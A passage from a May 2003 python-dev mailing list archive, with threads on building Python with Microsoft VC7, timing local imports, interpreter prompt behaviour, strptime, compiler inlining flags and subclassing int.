        from m import *
	x; x; x; x; x; x; x; x; x; x
	x; x; x; x; x; x; x; x; x; x
	x; x; x; x; x; x; x; x; x; x
	x; x; x; x; x; x; x; x; x; x
	x; x; x; x; x; x; x; x; x; x

for fn in f, g:
	t0 = time.clock()
	for i in range(1e6): fn()
	t1 = time.clock()
	print "time for", fn, t1-t0
########################################################################


From dave@boost-consulting.com  Thu May  8 03:02:34 2003
From: dave@boost-consulting.com (David Abrahams)
Date: Wed, 07 May 2003 22:02:34 -0400
Subject: [Python-Dev] Re: MS VC 7 offer
In-Reply-To: <010501c314ba$6b8dbef0$21795418@dell1700> (Brian Quinlan's
 message of "Wed, 07 May 2003 10:02:19 -0700")
References: <010501c314ba$6b8dbef0$21795418@dell1700>
Message-ID: <ud6iutcud.fsf@boost-consulting.com>

Brian Quinlan <brian@sweetapp.com> writes:

>> > That is information about the core ABI. I do need to be concerned
>> > about changes in the libraries, as well, in particular about
>> > incompatibilities resulting from multiple copies of the C library. 
>> > You said you don't know much about that.
>> 
>> I can find out almost as easily, if you have specific questions.
>
> But the actual question that we would like to answer is quite broad:
> what are all of the possible compatibility problems associated with
> using a VC6 compiled DLL with a VC7 compiled application?
>
> Assuming that only changed runtime data structures are going to be a
> problem, knowing which ones cannot be passed between the two versions
> would be nice. Below is a list of the standard types defined by
> Microsoft's VC6 runtime library (taken from the VC6 docs):
>
> clock_t
> _complex
> _dev_t
> div_t, ldiv_t
> _exception
> FILE
> _finddata_t, _wfinddata_t, _wfinddatai64_t
> _FPIEEE_RECORD
> fpos_t
> _HEAPINFO
> jmp_buf
> lconv
> _off_t
> _onexit_t
> _PNH
> ptrdiff_t
> sig_atomic_t
> size_t
> _stat
> time_t
> _timeb
> tm
> _utimbuf
> va_list
> wchar_t
> wctrans_t
> wctype_t
> wint_t

So do you want me to ask what all the possible compatibility problems
are, or do you want me to ask which of the above structures cannot be
passed between the two versions (or neither)?

-- 
Dave Abrahams
Boost Consulting
www.boost-consulting.com



From logistix@cathoderaymission.net  Thu May  8 03:48:50 2003
From: logistix@cathoderaymission.net (logistix)
Date: Wed, 7 May 2003 22:48:50 -0400
Subject: [Python-Dev] Building Python with .NET 2003 SDK
Message-ID: <000201c3150c$5b294cd0$20bba8c0@XP>

I decided to see if you really could build Python with the .NET
compiler.

I just got a preliminary build done that passed 67 tests (and failed 17)

Two big gothas:

1) You also need to install the "Platform SDK".  This one makes the .NET
SDK download seem fast.

2) VC6 generated makefiles include references to a few .lib files that
aren't included.  They also don't seem to be needed either.  The
offending librarys are largeint.lib, odbc32.lib, and odbccp32.lib.

More detailed notes on what had to be done to get it working can be
found here,

http://www.cathoderaymission.net/~logistix/python/buildingPythonWithDotN
et.html

Enjoy!

-Grant



From skip@pobox.com  Thu May  8 04:23:58 2003
From: skip@pobox.com (Skip Montanaro)
Date: Wed, 7 May 2003 22:23:58 -0500
Subject: [Python-Dev] local import cost
Message-ID: <16057.52686.475079.530463@montanaro.dyndns.org>

Thanks to Raymond H for pointing out the probably fallacy in my original
timeit runs.  Here's a simple timer which I think gets at what I'm after:

    import time
    import math
    import sys

    N = 500000

    def fmath():
        import math

    def fpass():
        pass

    v = sys.version.split()[0]

    t = time.clock()
    for i in xrange(N):
        fmath()
    fmathcps = N/(time.clock()-t)

    t = time.clock()
    for i in xrange(N):
        fpass()
    fpasscps = N/(time.clock()-t)

    print "%s fpass/fmath: %.1f" % (v, fpasscps/fmathcps)

On my Mac I get these outputs:

    2.1.3 fpass/fmath: 5.0
    2.2.2 fpass/fmath: 5.6
    2.3b1+ fpass/fmath: 5.3

Naturally, I expect fpass() to run a lot faster than fmath().  If my
presumption is correct though, there will be a sharp increase in the ratio,
maybe in 2.0 or 2.1, or whenever nested scopes were first introduced.

I can't run anything earlier than 2.1.x (I'll see about building 2.1) on my
Mac.  I'd have to break out my Linux laptop and do a bunch of downloading
and compiling to get earlier results.


From brian@sweetapp.com  Thu May  8 08:08:48 2003
From: brian@sweetapp.com (Brian Quinlan)
Date: Thu, 08 May 2003 00:08:48 -0700
Subject: [Python-Dev] Re: MS VC 7 offer
In-Reply-To: <ud6iutcud.fsf@boost-consulting.com>
Message-ID: <002f01c31530$ac4b5ee0$21795418@dell1700>

> So do you want me to ask what all the possible compatibility problems
> are, or do you want me to ask which of the above structures cannot be
> passed between the two versions (or neither)?

The former question would be best as the later would seem to be a
subset.

Cheers,
Brian



From sjoerd@acm.org  Thu May  8 09:11:15 2003
From: sjoerd@acm.org (Sjoerd Mullender)
Date: Thu, 08 May 2003 10:11:15 +0200
Subject: [Python-Dev] odd interpreter feature
In-Reply-To: <16057.12583.500034.130135@montanaro.dyndns.org>
References: <16057.5934.556547.671279@montanaro.dyndns.org> <200305071502.h47F2LK03176@pcp02138704pcs.reston01.va.comcast.net> <16057.9037.913362.225855@montanaro.dyndns.org> <200305071533.h47FXVf03526@pcp02138704pcs.reston01.va.comcast.net>
 <16057.12583.500034.130135@montanaro.dyndns.org>
Message-ID: <20030508081115.79E3174230@indus.ins.cwi.nl>

Isn't it the case that you should only get a secondary prompt after the
comment line if the comment line *itself* had a secondary prompt?

On Wed, May 7 2003 Skip Montanaro wrote:

> 
>     Guido> Please do.  The indentation level should be easily available,
>     Guido> since it is computed by the tokenizer.
> 
> Alas, it's more complicated than just the indentation level of the current
> line.  I need to know if the previous line was indented, which I don't think
> the tokenizer knows (at least examining *tok in gdb under various conditions
> suggests it doesn't).
> 
> I see the following possible cases (there are perhaps more, but I think they
> are similar enough to ignore here):
> 
>     >>> if x == y:
>     ...   # hello
>     ...   pass
>     ... 
>     >>> if x == y:
>     ...   x = 1
>     ... # hello
>     ...   pass
>     ... 
>     >>> x = 1
>     >>> # hello
>     ... 
>     >>> 
> 
> Only the last case should display the primary prompt after the comment is
> entered.  The other two correctly display the secondary prompt.  It's
> distinguishing the second and third cases in the tokenizer without help from
> the parser that's the challenge.
> 
> Oh well.  Perhaps it's a wart best left alone.

-- Sjoerd Mullender <sjoerd@acm.org>


From mal@lemburg.com  Thu May  8 11:38:44 2003
From: mal@lemburg.com (M.-A. Lemburg)
Date: Thu, 08 May 2003 12:38:44 +0200
Subject: [Python-Dev] MS VC 7 offer
In-Reply-To: <BIEJKCLHCIOIHAGOKOLHEEJKFJAA.tim.one@comcast.net>
References: <BIEJKCLHCIOIHAGOKOLHEEJKFJAA.tim.one@comcast.net>
Message-ID: <3EBA33B4.3080601@lemburg.com>

Tim Peters wrote:
> [Martin v. Lowis]
> 
>>...
>>Some are sincerely hoping, or even expecting, that Python 2.3 is
>>released with VC7, so that they can embed Python in their VC7-based
>>application without having to recompile it.
>>
>>No matter what the choice is, somebody will be unhappy.
> 
> OTOH, I don't see anything to stop releasing VC6 and VC7 versions of Python,
> except for the absence of a volunteer to do it.  While the Wise installer is
> proprietary, there's nothing hidden about what goes into a release, there
> are several free installers people *could* use instead, and the build
> process for the 3rd-party components is pretty exhaustively documented.
> 
> Speaking of which, presumably Tcl/Tk and SSL and etc on Windows should also
> be compiled under VC7 then.

I'm sure commercial players like e.g. ActiveState will happily
provide Windows installers for both versions.

Personally I don't think that people will switch to VC7 all that
soon -- the .NET libs are still far from being stable and as I read
the quotes on the VC compiler included in the .NET SDK, it will only
generate code that runs with the .NET libs installed. Could be wrong,
though.

Given that tools like distutils probably don't work
out of the box with the VC7 compiler suite, I'd wait at least
another release before making VC7 binaries the default on
Windows.

-- 
Marc-Andre Lemburg
eGenix.com

Professional Python Software directly from the Source  (#1, May 08 2003)
 >>> Python/Zope Products & Consulting ...         http://www.egenix.com/
 >>> mxODBC, mxDateTime, mxTextTools ...        http://python.egenix.com/
________________________________________________________________________
EuroPython 2003, Charleroi, Belgium:                        47 days left



From mwh@python.net  Thu May  8 11:54:21 2003
From: mwh@python.net (Michael Hudson)
Date: Thu, 08 May 2003 11:54:21 +0100
Subject: [Python-Dev] Re: [Python-checkins] python/dist/src/Doc/ext noddy2.c,NONE,1.1
 noddy3.c,NONE,1.1 newtypes.tex,1.21,1.22
In-Reply-To: <3EBA342A.7020006@zope.com> (Jim Fulton's message of "Thu, 08
 May 2003 06:40:42 -0400")
References: <E19DUtk-0003VA-00@sc8-pr-cvs1.sourceforge.net>
 <2mu1c568eq.fsf@starship.python.net> <3EBA342A.7020006@zope.com>
Message-ID: <2mr879674y.fsf@starship.python.net>

[Ccing python-dev because of the last paragraph]

Jim Fulton <jim@zope.com> writes:

> Michael Hudson wrote:
>> dcjim@users.sourceforge.net writes:
>> 
>>>Update of /cvsroot/python/python/dist/src/Doc/ext
>>>In directory sc8-pr-cvs1:/tmp/cvs-serv13294
>>>
>>>Modified Files:
>>> 	newtypes.tex Added Files:
>>> 	noddy2.c noddy3.c Log Message:
>>>Rewrote the basic section of the chapter on defining new types.
>> As the original author of this section, thank you!
>
> You're welcome. :)
>
> My main reason for doing this was to learn the material myself.
> (I had the luxury of sitting next to Guido as I did it and bugging
> him with questions. :)

That would help :-)

>> Do you mention anywhere that this only works for 2.2 and up?  That
>> might be an idea.
>
> OK, I'll add that in the introduction. It was *already* dependent on
> Python 2.3 due to the use of PyMODINIT_FUNC as the type of the init
> function.

Yes.  That wasn't me, and whoever changed it didn't keep the .c file
in sync with the bits of it quoted in the .tex file, grumble.

> I'm not sure why this is needed rather than void. Maybe I should change this
> so it works with Python 2.2. I'll talk to Guido and Fred about this.

The Py_MODINIT()/DL_IMPORT() thing is an annoying
incompatibility-causer ... perhaps something to deal with this could
be added to pymemcompat.h? (in which case it's misnamed...)

Cheers,
M.

-- 
  ARTHUR:  Ford, you're turning into a penguin, stop it.
                    -- The Hitch-Hikers Guide to the Galaxy, Episode 2


From paoloinvernizzi@dmsware.com  Thu May  8 12:08:41 2003
From: paoloinvernizzi@dmsware.com (Paolo Invernizzi)
Date: Thu, 08 May 2003 13:08:41 +0200
Subject: [Python-Dev] MS VC 7 offer
In-Reply-To: <3EBA33B4.3080601@lemburg.com>
References: <BIEJKCLHCIOIHAGOKOLHEEJKFJAA.tim.one@comcast.net> <3EBA33B4.3080601@lemburg.com>
Message-ID: <3EBA3AB9.8020305@dmsware.com>

M.-A. Lemburg wrote:

> as I read
> the quotes on the VC compiler included in the .NET SDK, it will only
> generate code that runs with the .NET libs installed. Could be wrong,
> though. 

Uh?  The VC compiler included with the .NET SDK can only generate 
managed code? I don't think so...

> Given that tools like distutils probably don't work
> out of the box with the VC7 compiler suite, I'd wait at least
> another release before making VC7 binaries the default on
> Windows. 

Actually I have VC6 *and* VC7 in my at-work machine, python22 (Standard 
distribution, VC6 based), python 23b1 (Standard, VC6 based) and python 
cvs, wich I manually build with VC7.
I can build/install distutils packages choosing wich environment to use 
(6 or 7) and python to use (22, 23b1, 23 head).
So I think this is a no-problem...

But isn't possible, at least, to have a 'not-default' release compiled 
with VC7?

It can be a boost for having other *complicated* packages released with 
VC7 among with VC6 (I'm thinking at wxPython, and so...)

---
Paolo Invernizzi








From nhodgson@bigpond.net.au  Thu May  8 12:31:20 2003
From: nhodgson@bigpond.net.au (Neil Hodgson)
Date: Thu, 08 May 2003 21:31:20 +1000
Subject: [Python-Dev] MS VC 7 offer
References: <BIEJKCLHCIOIHAGOKOLHEEJKFJAA.tim.one@comcast.net>
 <3EBA33B4.3080601@lemburg.com>
Message-ID: <000d01c31555$59222800$3da48490@neil>

M.-A. Lemburg:

> Personally I don't think that people will switch to VC7 all that
> soon -- the .NET libs are still far from being stable and as I read
> the quotes on the VC compiler included in the .NET SDK, it will only
> generate code that runs with the .NET libs installed. Could be wrong,
> though.

   VC7 can produce stand-alone binaries that do not need the .NET framework
or even the C runtime DLLs. I have distributed executable versions of my
Scintilla and SciTE projects built with VC7 for 9 months now. The
executables are quite a bit smaller and faster (average of 10%) over VC6.
The link time code generation option which can inline functions at link time
rather than compile time is effective.

   Possible issues with moving to VC7 are ensuring compatibility with
extension modules and the End User License Agreement. I looked at the EULA
thoroughly before buying VC7 as the license includes some clauses that may
cause problems for open source software that may be included in GPLed
applications. Redistributing applications compiled with VC7 is OK, but
redistributing the runtime DLLs such as msvcr70.dll (which is not already
present on pre VC7 versions of Windows) can not be done with GPLed code:
"""
(ii) not distributing Identified Software in conjunction with the
Redistributables or a derivative work thereof;
...
 Identified Software includes, without limitation, any software that
requires as a condition of use, modification and/or distribution of such
software that other software incorporated into, derived from or distributed
with such software be (1) disclosed or distributed in source code form; (2)
be licensed for the purpose of making derivative works; or (3) be
redistributable at no charge.
"""

   MS may have come to their senses and dropped this for Visual Studio 2003.

   It can be quite fun tracking the EULA down and working out which
components are licensed under which EULA. When downloading .NET before VC7
was available, the web site EULA was different to the installer's version.

   Neil



From mal@lemburg.com  Thu May  8 12:37:51 2003
From: mal@lemburg.com (M.-A. Lemburg)
Date: Thu, 08 May 2003 13:37:51 +0200
Subject: [Python-Dev] MS VC 7 offer
In-Reply-To: <3EBA3AB9.8020305@dmsware.com>
References: <BIEJKCLHCIOIHAGOKOLHEEJKFJAA.tim.one@comcast.net>	<3EBA33B4.3080601@lemburg.com> <3EBA3AB9.8020305@dmsware.com>
Message-ID: <3EBA418F.3020006@lemburg.com>

Paolo Invernizzi wrote:
> M.-A. Lemburg wrote:
> 
>> as I read
>> the quotes on the VC compiler included in the .NET SDK, it will only
>> generate code that runs with the .NET libs installed. Could be wrong,
>> though. 
> 
> Uh?  The VC compiler included with the .NET SDK can only generate 
> managed code? I don't think so...

That's what I read in messages on this topic on google groups.
I've just downloaded the SDK myself and will probably give it
a go later today.

>> Given that tools like distutils probably don't work
>> out of the box with the VC7 compiler suite, I'd wait at least
>> another release before making VC7 binaries the default on
>> Windows. 
> 
> Actually I have VC6 *and* VC7 in my at-work machine, python22 (Standard 
> distribution, VC6 based), python 23b1 (Standard, VC6 based) and python 
> cvs, wich I manually build with VC7.
> I can build/install distutils packages choosing wich environment to use 
> (6 or 7) and python to use (22, 23b1, 23 head).
> So I think this is a no-problem...

That's good to know (btw, how do you tell distutils which VC
version to use ? or does it find out by itself using the
Python time machine ;-).

> But isn't possible, at least, to have a 'not-default' release compiled 
> with VC7?
> 
> It can be a boost for having other *complicated* packages released with 
> VC7 among with VC6 (I'm thinking at wxPython, and so...)

If someone volunteers to maintain such a branch, I suppose
there's nothing preventing it :-)

Perhaps we should look at the offer in a different light...

What advantage would the move from VC6 to VC7 give Python users ?

-- 
Marc-Andre Lemburg
eGenix.com

Professional Python Software directly from the Source  (#1, May 08 2003)
 >>> Python/Zope Products & Consulting ...         http://www.egenix.com/
 >>> mxODBC, mxDateTime, mxTextTools ...        http://python.egenix.com/
________________________________________________________________________
EuroPython 2003, Charleroi, Belgium:                        47 days left



From Paul.Moore@atosorigin.com  Thu May  8 12:53:54 2003
From: Paul.Moore@atosorigin.com (Moore, Paul)
Date: Thu, 8 May 2003 12:53:54 +0100
Subject: [Python-Dev] MS VC 7 offer
Message-ID: <16E1010E4581B049ABC51D4975CEDB88619A6B@UKDCX001.uk.int.atosorigin.com>

From: Neil Hodgson [mailto:nhodgson@bigpond.net.au]
> Possible issues with moving to VC7 are ensuring compatibility with
> extension modules

That's the one that I see as most important. For the PythonLabs
distribution to move to VC7, it sounds as if many of the Windows
binary extensions in existence will also need to be built with VC7.
I've no idea how much of a problem this would be to extension
authors, but it would be a problem to end users if extension authors
could no longer provide binaries.

For reference, extensions I'd be in trouble without include win32all,
wxPython, cx_Oracle, pyXML (on occasion), ctypes, PIL, mod_python. I've
used many others on occasion, and no VC7 version would be an issue
for me.

So I guess that's the key issue. Can the majority of extension authors
produce VC7-compatible binaries? This probably needs to be asked on
comp.lang.python, not just on python-dev.

Paul.


From paoloinvernizzi@dmsware.com  Thu May  8 13:25:21 2003
From: paoloinvernizzi@dmsware.com (Paolo Invernizzi)
Date: Thu, 08 May 2003 14:25:21 +0200
Subject: [Python-Dev] MS VC 7 offer
In-Reply-To: <3EBA418F.3020006@lemburg.com>
References: <BIEJKCLHCIOIHAGOKOLHEEJKFJAA.tim.one@comcast.net>	<3EBA33B4.3080601@lemburg.com> <3EBA3AB9.8020305@dmsware.com> <3EBA418F.3020006@lemburg.com>
Message-ID: <3EBA4CB1.6020904@dmsware.com>

M.-A. Lemburg wrote:

> That's good to know (btw, how do you tell distutils which VC
> version to use ? or does it find out by itself using the
> Python time machine ;-). 

I simply run the right .bat file that sets all the needed variables 
before running the setup.py  ;-)

> If someone volunteers to maintain such a branch, I suppose
> there's nothing preventing it :-) 

As I guessed :-)
I think that the next release of scons can open new perspectives... (see 
previous post of  Greg Spencer)

> Perhaps we should look at the offer in a different light...
>
> What advantage would the move from VC6 to VC7 give Python users ? 

I don't know if there are advantages on *moving*... but I'm concerned on 
*adding*... a VC7 plus a VC6 release...

---
Paolo Invernizzi







From DavidA@ActiveState.com  Thu May  8 17:29:14 2003
From: DavidA@ActiveState.com (David Ascher)
Date: Thu, 08 May 2003 09:29:14 -0700
Subject: [Python-Dev] MS VC 7 offer
In-Reply-To: <3EBA33B4.3080601@lemburg.com>
References: <BIEJKCLHCIOIHAGOKOLHEEJKFJAA.tim.one@comcast.net> <3EBA33B4.3080601@lemburg.com>
Message-ID: <3EBA85DA.5050806@ActiveState.com>

M.-A. Lemburg wrote:
> Tim Peters wrote:

> I'm sure commercial players like e.g. ActiveState will happily
> provide Windows installers for both versions.

We will as soon as our customers ask for it.  So far, we've gotten no interest 
in that direction.

--david



From brian@sweetapp.com  Thu May  8 17:34:10 2003
From: brian@sweetapp.com (Brian Quinlan)
Date: Thu, 08 May 2003 09:34:10 -0700
Subject: [Python-Dev] Re: MS VC 7 offer
In-Reply-To: <ud6iutcud.fsf@boost-consulting.com>
Message-ID: <008701c3157f$a7169210$21795418@dell1700>

Carl Kleffner referred me to an interesting discussion regarding VC6 and
VC7 compatibility:
http://tinyurl.com/baok

The bottom line seems to be that the C runtime libraries for VC6 and VC7
are currently binary compatible but that might change in the future. And
CRT-allocated resources cannot be shared between the two.

Cheers,
Brian 



From mal@lemburg.com  Thu May  8 17:36:57 2003
From: mal@lemburg.com (M.-A. Lemburg)
Date: Thu, 08 May 2003 18:36:57 +0200
Subject: [Python-Dev] MS VC 7 offer
In-Reply-To: <3EBA85DA.5050806@ActiveState.com>
References: <BIEJKCLHCIOIHAGOKOLHEEJKFJAA.tim.one@comcast.net>	<3EBA33B4.3080601@lemburg.com> <3EBA85DA.5050806@ActiveState.com>
Message-ID: <3EBA87A9.7090805@lemburg.com>

David Ascher wrote:
> M.-A. Lemburg wrote:
> 
>> Tim Peters wrote:
> 
> 
>> I'm sure commercial players like e.g. ActiveState will happily
>> provide Windows installers for both versions.
> 
> We will as soon as our customers ask for it.  So far, we've gotten no 
> interest in that direction.

I suppose that's fair enough :-)

-- 
Marc-Andre Lemburg
eGenix.com

Professional Python Software directly from the Source  (#1, May 08 2003)
 >>> Python/Zope Products & Consulting ...         http://www.egenix.com/
 >>> mxODBC, mxDateTime, mxTextTools ...        http://python.egenix.com/
________________________________________________________________________
EuroPython 2003, Charleroi, Belgium:                        47 days left



From lists@morpheus.demon.co.uk  Thu May  8 19:03:32 2003
From: lists@morpheus.demon.co.uk (Paul Moore)
Date: Thu, 08 May 2003 19:03:32 +0100
Subject: [Python-Dev] MS VC 7 offer
References: <16E1010E4581B049ABC51D4975CEDB88619A64@UKDCX001.uk.int.atosorigin.com> <046a01c31487$399d3390$530f8490@eden>
Message-ID: <n2m-g.u1c55n9n.fsf@morpheus.demon.co.uk>

"Mark Hammond" <mhammond@skippinet.com.au> writes:

> I must say that anecdotally, I find this to be true. Developers are
> *not* flocking to VC7. I wonder if that fact has anything to do with
> MS offering free compilers?

One further data point - the free mingw gcc compiler generates
binaries which depend on msvcrt.dll. So, if the Pythonlabs
distribution switches to MSVC7, developers using MSVC6 *and*
developers using mingw will be unable to build compatible extensions. 
The only compatible compiler will be MSVC7 (either the paid for
version or the free limited version).

Whatever you may think of Microsoft's offer, I feel that this
reduction in choice is a bad thing.

Paul.
-- 
This signature intentionally left blank


From bbolli@ymail.ch  Thu May  8 21:20:12 2003
From: bbolli@ymail.ch (Beat Bolli)
Date: Thu, 8 May 2003 22:20:12 +0200
Subject: [Python-Dev] Subclassing int? [Was: Re: [PEP] += on return of function call result]
Message-ID: <20030508202012.GA3809@bolli.homeip.net>

Andrew Koenig wrote:

> > Why can't you do this?
> >       foo =3D log.setdefault(r,'')
> >       foo +=3D "test %d\n" % t

> You can do it, but it's useless!

I got bitten by the same problem some time ago. Please let me explain:

I needed to count words, using a dict, of course. So, in my first
enthusiasm, I wrote:

        count =3D {}
        for word in wordlist:
            count.setdefault(word, 0) +=3D 1

This, as I soon realized, didn't work, exactly because ints are immutable=
.
So I tried a different track. No problem, I thought, in the new Python
object world, the native classes can be subclassed. I imagined I could
enhance the int class with an inc() method, thusly:

	class Counter(int):
	    def inc(self):
                # to be defined
                self +=3D 1??

        count =3D {}
        for word in wordlist:
            count.setdefault(word, Counter()).inc()

As you can see, I have a problem at the comment: how do I access the
inherited int value??? I realized that this also wasn't going to work,
either. I finally used the perhaps idiomatic

        count =3D {}
        for word in wordlist:
            count[word] =3D count.get(word, 0) + 1

which of course is suboptimal, because the lookup is done twice. I decide=
d
not to implement a proper Counter class for memory efficiency reasons. Th=
e
code would have been simple:

        class Counter:
            def __init__(self):
                self.n =3D 0
            def inc(self):
                self.n +=3D 1
            def get(self):
                return self.n

        count =3D {}
        for word in wordlist:
            count.setdefault(word, Counter()).inc()

But to restate the core question: can class Counter be written as a subcl=
ass
of int?

Beat Bolli (please CC: me on replys, I'm not on the list)
--=20
mail: `echo '<bNObolli@ymaSPilAM.ch>' | sed -e 's/[A-S]//g'`
pgp:  0x506A903A; 49D5 794A EA77 F907 764F D89E 304B 93CF 506A 903A
icbm: 47=B0 02' 43.0" N, 07=B0 16' 17.5" E (WGS84)


From lists@morpheus.demon.co.uk  Thu May  8 21:05:28 2003
From: lists@morpheus.demon.co.uk (Paul Moore)
Date: Thu, 08 May 2003 21:05:28 +0100
Subject: [Python-Dev] MS VC 7 offer
References: <BIEJKCLHCIOIHAGOKOLHEEJKFJAA.tim.one@comcast.net> <3EBA33B4.3080601@lemburg.com>
 <3EBA85DA.5050806@ActiveState.com>
Message-ID: <n2m-g.n0hx5hmf.fsf@morpheus.demon.co.uk>

David Ascher <DavidA@ActiveState.com> writes:

>> I'm sure commercial players like e.g. ActiveState will happily
>> provide Windows installers for both versions.
>
> We will as soon as our customers ask for it.  So far, we've gotten no
> interest in that direction.

Is that no interest in a VC7 version? If so, that's probably pretty
relevant information...

Paul.
-- 
This signature intentionally left blank


From tim.one@comcast.net  Thu May  8 22:56:32 2003
From: tim.one@comcast.net (Tim Peters)
Date: Thu, 08 May 2003 17:56:32 -0400
Subject: [Python-Dev] MS VC 7 offer
In-Reply-To: <3EBA418F.3020006@lemburg.com>
Message-ID: <BIEJKCLHCIOIHAGOKOLHCEONFJAA.tim.one@comcast.net>

[M.-A. Lemburg]
> ...
> Perhaps we should look at the offer in a different light...
>
> What advantage would the move from VC6 to VC7 give Python users ?

In general, smaller and faster code is a decent bet.  For those who use VC7
already, an easier life.  "Move" implies abandoning VC6, though, and I don't
think that's a realistic possibility now -- although over time it's
inevitable (VC6 is akin to Python 1.5.2 now:  beloved by some but
unsupported by all <wink>).



From tim_one@email.msn.com  Fri May  9 05:10:46 2003
From: tim_one@email.msn.com (Tim Peters)
Date: Fri, 9 May 2003 00:10:46 -0400
Subject: [Python-Dev] Make _strptime only time.strptime implementation?
In-Reply-To: <Pine.SOL.4.55.0305071511430.11630@death.OCF.Berkeley.EDU>
Message-ID: <LNBBLJKPBEHFEDALKOLCCEFMEJAB.tim_one@email.msn.com>

[Brett Cannon]
> Someone filed a bug report wanting it to be mentioned that most libc
> implementations  of strptime don't handle %Z.  Michael asked whether
> _strptime was going to become the permanent version of time.strptime or
> not.  This was partially discussed back when Guido used his amazing time
> machine to make time.strptime use _strptime exclusively for testing
> purposes.
>
> I vaguely remember Tim saying he supported moving to _strptime, but I
> don't remember Guido having an opinion.  If this is going to happen for
> 2.3 I would like to know so as to fix the documentation to be better.

As we left it, we were going to wait for the 2.3 alpha and beta testers to
raise a stink if the new implementation didn't work out for them (you'll
recall that the call to the platform strptime() is disabled in 2.3b1, via an
unconditional

#undef HAVE_STRPTIME

in timemodule.c).  Nobody has even cut a little gas yet, so I'd proceed
under the assumption that nobody will, and that the disable HAVE_STRTIME
code will be physically deleted.  If that turns out to be wrong, big deal,
you stay up all night fixing it under intense pressure <wink>.



From tim_one@email.msn.com  Fri May  9 05:17:59 2003
From: tim_one@email.msn.com (Tim Peters)
Date: Fri, 9 May 2003 00:17:59 -0400
Subject: [Python-Dev] Microsoft speedup
In-Reply-To: <Xns9374933CC2E5Cduncanrcpcouk@127.0.0.1>
Message-ID: <LNBBLJKPBEHFEDALKOLCMEFMEJAB.tim_one@email.msn.com>

[Duncan Booth]
> I was just playing around with the compiler options using
> Microsoft VC6 and
> I see that adding the option /Ob2 speeds up pystone by about 2.5%
> (/Ob2 is the option to automatically inline functions where the compiler
> thinks it is worthwhile.)
>
> The downside is that it increases the size of python23.dll by about 13%.
>
> It's not a phenomenal speedup, but it should be pretty low impact if the
> extra size is considered a worthwhile tradeoff.

I want to see much broader testing first.  A couple employers ago, we
disabled all magical inlining options, because sometimes they made critical
loops faster, and sometimes slower, and you couldn't guess which as the code
changed, and in that problem domain (speech recognition) the critical loops
were truly critical so we were acutely aware of compiled-code speed
regressions.  So I'm not discouraged <wink> that pystone sped up when you
tried it, but not particularly encouraged either.

I expect it's more worth trying in Python, as hardly any code in Python goes
three lines without a function call or conditional branch.



From python-list@python.org  Fri May  9 08:49:33 2003
From: python-list@python.org (Alex Martelli)
Date: Fri, 9 May 2003 09:49:33 +0200
Subject: [Python-Dev] Subclassing int? [Was: Re: [PEP] += on return of function call result]
In-Reply-To: <20030508202012.GA3809@bolli.homeip.net>
References: <20030508202012.GA3809@bolli.homeip.net>
Message-ID: <200305090949.33064.aleax@aleax.it>

Followups set to python-list since this is NOT an appropriate subject matter
for python-dev.  Please continue the discussion on python-list, thanks.

On Thursday 08 May 2003 10:20 pm, Beat Bolli wrote:
   ...
>         count = {}
>         for word in wordlist:
>             count.setdefault(word, 0) += 1
>
> This, as I soon realized, didn't work, exactly because ints are immutable.

Actually it doesn't work because you cannot assign to a function call; the
fact that ints are immutable doesn't enter the picture.

> 	class Counter(int):
> 	    def inc(self):
>                 # to be defined
>                 self += 1??

HERE is where the fact that ints are immutable will bite.  If += mutated
self, this would work -- but it doesn't because ints are immutable.

> As you can see, I have a problem at the comment: how do I access the
> inherited int value??? I realized that this also wasn't going to work,

int(self) will "access the inherited int value" if I understand your meaning.
But it doesn't help you here.

> either. I finally used the perhaps idiomatic
>
>         count = {}
>         for word in wordlist:
>             count[word] = count.get(word, 0) + 1
>
> which of course is suboptimal, because the lookup is done twice. I decided

Yes.

> not to implement a proper Counter class for memory efficiency reasons. The

__slots__ fix your memory efficiency issues: that's the REASON they exist.
However, there's ANOTHER problem...:

> code would have been simple:
>
>         class Counter:
>             def __init__(self):
>                 self.n = 0
>             def inc(self):
>                 self.n += 1
>             def get(self):
>                 return self.n
>
>         count = {}
>         for word in wordlist:
>             count.setdefault(word, Counter()).inc()
>
> But to restate the core question: can class Counter be written as a
> subclass of int?

No (not meaningfully).

The performance tradeoff is tricky not because of memory considerations (which
__slots__ fix) but because you're generating (and often throwing away) a 
Counter instance EVERY time.  Witness:

[alex@lancelot Lib]$ python timeit.py -s'''
count = {}
words = "some are and some are not and some are irksome".split()
''' 'for w in words:'  '  count[w]=count.get(w,0)+1'
100000 loops, best of 3: 11.6 usec per loop

versus:

[alex@lancelot Lib]$ python timeit.py -s'''
count = {}
words = "some are and some are not and some are irksome".split()
class Cnt(object):
  __slots__=["n"]
  def __init__(self): self.n=0
  def inc(self): self.n+=1
''' 'for w in words:'  '  count.setdefault(w,Cnt()).inc()'
10000 loops, best of 3: 43.4 usec per loop

See?  It's not a speedup, but a slowdown by about FOUR times in this
example.

If you want speed, go for speed:

[alex@lancelot Lib]$ python timeit.py -s'''
count = {}
words = "some are and some are not and some are irksome".split()
import psyco
psyco.full()
''' 'for w in words:'  '  count[w]=count.get(w,0)+1'
100000 loops, best of 3: 3.33 usec per loop

Now THIS is acceleration -- a speedup of over THREE times.  And without
any complication nor abandonment of the idiomatic way of expression, too.

> Beat Bolli (please CC: me on replys, I'm not on the list)

Done.  But please use python-list for these discussions: python-dev is only
for discussion about development of *Python itself*.


Alex



From duncan@rcp.co.uk  Fri May  9 09:19:28 2003
From: duncan@rcp.co.uk (Duncan Booth)
Date: Fri, 09 May 2003 09:19:28 +0100
Subject: [Python-Dev] Microsoft speedup
In-Reply-To: <LNBBLJKPBEHFEDALKOLCMEFMEJAB.tim_one@email.msn.com>
References: <Xns9374933CC2E5Cduncanrcpcouk@127.0.0.1>
Message-ID: <3EBB72A0.5651.54D47C4@localhost>

On 9 May 2003 at 0:17, Tim Peters wrote:

> [Duncan Booth]
> > It's not a phenomenal speedup, but it should be pretty low impact if the
> > extra size is considered a worthwhile tradeoff.
> 
> I want to see much broader testing first.  A couple employers ago, we
> disabled all magical inlining options, because sometimes they made critical
> loops faster, and sometimes slower, and you couldn't guess which as the code
> changed, and in that problem domain (speech recognition) the critical loops
> were truly critical so we were acutely aware of compiled-code speed
> regressions.  So I'm not discouraged <wink> that pystone sped up when you
> tried it, but not particularly encouraged either.

I'm not suggesting Guido rush out and change the options right 
now, but I wanted to know whether it would be worth looking at 
this further. For all I know its been discussed and dismissed 
already, in which case there isn't much point my looking 
further at it. Also if the main distribution should move to 
VC7, then it would probably be better to check whether this 
sort of micro tweaking has any effect there before wasting 
time on it. 

I've had plenty of experience myself of changing Microsoft 
